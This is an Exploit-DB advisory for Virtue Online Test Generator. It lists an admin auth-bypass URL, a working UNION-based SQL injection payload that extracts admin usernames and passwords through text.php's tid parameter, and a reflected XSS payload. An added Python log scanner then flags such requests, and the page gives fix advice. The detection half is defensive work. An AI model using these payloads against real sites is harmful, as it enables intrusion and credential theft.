- 18 Dec 2022
- EDB-ID: 9022
- EDB verification: Passed
- Author: HXH
- Vulnerability type: WEBAPPS
- Platform: PHP
- CVE: CVE-2009-2393 CVE-2009-2392 CVE-2009-2391
- Publication date: 2009-06-26
Code:
+===================================================================================+
| |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |
| |
+===================================================================================+
| |
| Author.: HxH |
| Contact: HxH[at]live[dot]at |
| |
+===================================================================================+
| |
| Script.: Virtue Online Test Generator |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php |
| |
+-----------------------------------------------------------------------------------+
| |
| Exploit: After user login |
| |
| [+] Auth Bypass |
| |
| http://[website]/[script]/admin/index.php |
| |
| [+] SQLi |
| |
| http://[website]/[script]/text.php?tid=[SQL] |
| |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |
| |
| [+] XSS |
| |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |
| |
+-----------------------------------------------------------------------------------+
| |
| Demo...: http://www.virtuenetz.com/exam |
| Usrinfo: E-mail:[email protected] ~ Pass:demo |
| |
+===================================================================================+
| |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |
| |
+===================================================================================+
# milw0rm.com [2009-06-26]
- Source: www.exploit-db.com
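From the defender's side, both the SQLi and the XSS entries above go through the same `tid` parameter of `text.php`, so one log check covers both. The following is an added example, not part of the original advisory or the vendor's code: it scans access-log lines for `tid` values that are not plain integers. It assumes `tid` is a numeric test ID and that the server writes common/combined-format access logs; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /exam/text.php?tid=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /exam/text.php?tid=null+union+select+1,2,3-- HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /exam/text.php?tid=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 601',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /exam/index.php HTTP/1.1" 200 300',
]

# Client address and request target from a common/combined log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_tid(value):
    """Label a decoded tid value; anything but a short integer is suspect."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    lowered = value.lower()
    if re.search(r"\b(union|select)\b|--|/\*", lowered):
        return "sqli-like"
    if re.search(r"<\s*script|on\w+\s*=|javascript:", lowered):
        return "xss-like"
    return "non-numeric"


def scan(lines):
    """Return (client, verdict, decoded_tid) for suspicious text.php requests."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/text.php"):
            continue
        # parse_qs URL-decodes values, so encoded payloads are caught too.
        for value in parse_qs(url.query, keep_blank_values=True).get("tid", []):
            verdict = classify_tid(value)
            if verdict != "ok":
                findings.append((client, verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule is the fix on the application side: reject or cast `tid` before it reaches the query, and HTML-encode it wherever it is echoed back.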